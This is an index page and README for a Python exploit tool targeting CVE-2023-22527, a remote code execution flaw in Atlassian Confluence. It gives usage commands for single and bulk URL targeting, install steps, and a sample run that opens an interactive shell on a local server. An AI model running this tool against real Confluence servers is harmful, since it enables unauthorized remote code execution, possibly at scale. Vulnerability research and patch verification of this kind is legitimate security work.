https://github.com/chocapikk/cve-2023-22527
Atlassian Confluence - Remote Code Execution
https://github.com/chocapikk/cve-2023-22527
Last synced: about 1 year ago
JSON representation
Atlassian Confluence - Remote Code Execution
- Host: GitHub
- URL: https://github.com/chocapikk/cve-2023-22527
- Owner: Chocapikk
- Created: 2024-01-23T10:55:28.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2024-01-23T11:30:10.000Z (over 2 years ago)
- Last Synced: 2025-04-13T17:07:29.080Z (about 1 year ago)
- Language: Python
- Size: 5.86 KB
- Stars: 10
- Watchers: 2
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Atlassian Confluence CVE-2023-22527 Scanner 🛡️
## Overview 🌟
This tool scans for the CVE-2023-22527 vulnerability in Atlassian Confluence, a critical RCE flaw allowing unauthorized remote code execution.
## Features 🚀
- **Single URL Scan**: Scan a specific target for the vulnerability.
- **Bulk Scan**: Process multiple URLs from a file for efficient vulnerability assessment.
- **Concurrency Control**: Utilize threading for faster bulk scanning.
- **Output Logging**: Save vulnerable URLs to a specified file.
## Usage 💻
1. **Single URL Scan**: `python exploit.py -u `
2. **Bulk Scan**: `python exploit.py -f `
3. **Set Threads**: `python exploit.py -t `
4. **Output File**: `python exploit.py -o `
## Requirements 📋
- Python 3.10+
- Dependencies: `requests`, `prompt_toolkit`, `rich`, `alive_progress`
## Installation 🛠️
1. Clone the repository: `git clone https://github.com/Chocapikk/CVE-2023-22527`
2. Install dependencies: `pip install -r requirements.txt`
## Example 🔍
```bash
$ python3 exploit.py -u http://localhost:8092
[+] http://localhost:8092 is vulnerable - confluence
[!] Shell is ready, please type your commands UwU
$ id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
$ pwd
/var/atlassian/application-data/confluence
$ hostname
ff7bfe2e7109
```
## Disclaimer ⚠️
This tool is intended for security research and should only be used on systems with explicit authorization. Misuse may lead to legal consequences.
## More Information 🔗
For more detailed information about the CVE-2023-22527 vulnerability, refer to the [Project Discovery Blog Post](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/).